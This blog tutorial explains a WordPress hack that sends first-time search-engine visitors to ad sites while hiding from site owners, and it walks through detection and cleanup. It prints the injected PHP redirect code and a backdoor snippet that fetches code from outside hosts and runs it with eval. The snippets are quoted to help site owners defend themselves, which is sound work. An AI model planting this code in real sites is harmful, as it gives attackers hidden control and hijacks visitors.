WordPress Search Engine Redirect Hack: The Symptoms and How to Fix It
Recently a security exploit in WordPres is taking the blogosphere by storm. It is a new kind of exploit because rather than defacing, taking the site down, inserting links to the footer or other obvious attacks, it tries to conceal its existence.
It works just like a simple cloaking script, but this time it covers its appearance from the owner and repeat visitors. Those who have cookie set for that domain by the browser will see the blog as if nothing has happened.
On the other hand, people who come from the search engines for the first time will be redirected to anyresults.net, keymachine.de, beliy.us and some other sites. Those sites are Made For AdSense (MFA) sites.
How to Reproduce It
The code tries to hide itself from the bloggers and existing visitors by bypassing the redirection if they find any cookie was set from the domain. If no cookie is found, the code will redirect the new visitors to the domain above.
Reproducing the hack is as simply as cleaning the cookies from that domain. You can do so in Firefox in the Privacy tab, select the your blog domain and click Remove Cookie. Internet Explorer users should click the Delete Cookies button in the Internet Options menu, under the General tab.
Search using Google, Yahoo, MSN or others using your keywords and click on your blog. If it redirects, your WordPress has been cracked. You can use the following Linux command line if you have access to shell account (your hosting may provide that):
curl -I -H "Referer: http://www.google.com/search?q=keyword" http://example.com
Visit the site manually by typing on the address bar of your browser, you should see the blog as usual.
The WordPress Hack Symptoms
The following are the symptoms of affected blogs:
- Sudden drop in traffic from search engines.
- Massive lose of revenue during that period of time.
- Perhaps delisted by Google (at least the potential is here).
For those who don’t care about the technical details and want step-by-step instructions to get rid of this, jump to the solution section.
If you are interested with technical details, here they are:
- Traffic referred by Google, MSN, Live, Windows Live, AltaVista, Ask, Yahoo, AOL, CNN, and Weather (most are popular search engines) will be redirected to the cracker’s sites.
- A visitor that has been cookied by the blog site will see the blog as usual. In this case, any kind of cookie counts, NOT only for users who have an account and login to the blog.
- The following code may appear in wp-blog-header.php file (in the root installation of your WordPress):
<?php $seref=array("google","msn","live","altavista","ask","yahoo","aol","cnn","weather","alexa"); $ser=0; foreach($seref as $ref) if(strpos(strtolower($_SERVER['HTTP_REFERER']),$ref)!==false){ $ser="1"; break; } if($ser=="1" && sizeof($_COOKIE)==0){ header("Location: http://".base64_decode("YW55cmVzdWx0cy5uZXQ=")."/"); exit; }?>
- A new plug-in that is named randomly but most likely end in .jpg or .gif (image files) appear in your WP installation. It is actually PHP code encoded in base64. Example: cddea_old.jpg. For the path to the rogue file, refer to the solution below. It may be in the theme or uploads directory.
- Two modifications in wp_options, one to activate the plugin and another line as an independent row containing the string rss_f541b3abd05e7962fcab37737f40fad8.
- Clicks on the RSS entries that go to the blog can be redirected to those sites too.
- This may be unrelated attack, but one person reported having the following malicious code inserted into other WP files:
if(isset($_GET['p'])) { $sock = @fsockopen('km20725.keymachine.de', 80); if($sock){ fwrite ($sock, 'GET http://km20725.keymachine.de/server/index.php?host='.$_SERVER['SERVER_NAME'].'&p='.$_GET['p'].' HTTP/1.0'."rn"); fwrite ($sock, 'Host: km20725.keymachine.de'."rnrn"); while($content[] = fgets ($sock)); $content = implode('', $content); @eval(trim(substr($content, strpos($content, "rnrn")))); fclose ($sock);} } if(isset($_GET['p'])) { @eval(@file_get_contents('http://beliy.us/server/index.php?host='.$_SERVER['SERVER_NAME'].'&p='.$_GET['p'])); } if(isset($_GET['p'])) { @eval(@file_get_contents('http://seogoogle.us/server/index.php?host='.$_SERVER['SERVER_NAME'].'&p='.$_GET['p'])); } eval(gzinflate(base64_decode(
Solution to Resolve the Hack
1. Check your WordPress theme files
Examine the header.php and index.php files for suspicious code. If there is a code that looks something like:
if($ser==”1? && sizeof($_COOKIE)==0){ header(”Location:
then delete it.
If you have a backup of your theme files on your computer, reupload to the server, overwriting the copy on the server. Transfer the server copy to your computer first if you are not sure.
2. Search through your posts
Tip: Make sure you have the newest backup of your database.
Use phpMyAdmin to browse WordPress MySQL database tables. Locate the active_plugins row inside the wp_options table. Go to the line (you may need to scroll to the right) and locate if there is any suspicious path to an image such as .jpg or .gif. The name of the file might be something like cddea_old.jpeg. Delete this file using FTP or file manager inside your web hosting control panel.
Proceed with the same wp_options table and locate for a string with rss_f541b3abd05e7962fcab37737f40fad8 as the option_name. Delete that row.
Go to the Plugins area in your dashboard, deactivate and activate again any existing plugin to refresh the data in this row (and get rid of the offending item).
3. Find the rogue user name
In the wp_users table, search for user that should not be there and those with null value in the user_nicename field and delete the user.
Clean up the wp_usermeta table for options associated to this user.
4. Disable directory indexing
If you server runs Apaache, add the following line to .htaccess in the root directory of your domain or of the blog:
Options -Indexes
to prevent others from seeing the list of directories and files on your server under the domain.
5. Upgrade your blog to the latest version of WordPress
Go through the three step upgrade process. Don’t forget to backup your database, but don’t overwrite old backups, you may need to restore a copy prior to the attack.
This will get rid of the malicious code in wp-blog-header.php.
Some people reported this hack works for 2.5.1 (currently the newest version of WordPress) too. If you are running one, overwrite all the files except wp-config.php and other files. Refer to the upgrade guide for the full list.
6. Change all passwords
Change the passwords to your WordPress login and your hosting account. Make both of them different. Use secure connection like SSH or HTTPS to do the password change for hosting account.
For a blog with multiple authors, ask them to change their passwords as soon as possible.
That’s it. If you find any problem, you may want to restore the backup from previous dates before the attack. If you don’t have it, restore the copy before you modify the values in the database and table, and repeat the process once again.
Return to WordPress How-to — Tips and Tricks to Work with WordPress.
Return to Blog Tips for a Better Blog — Blog Building University.
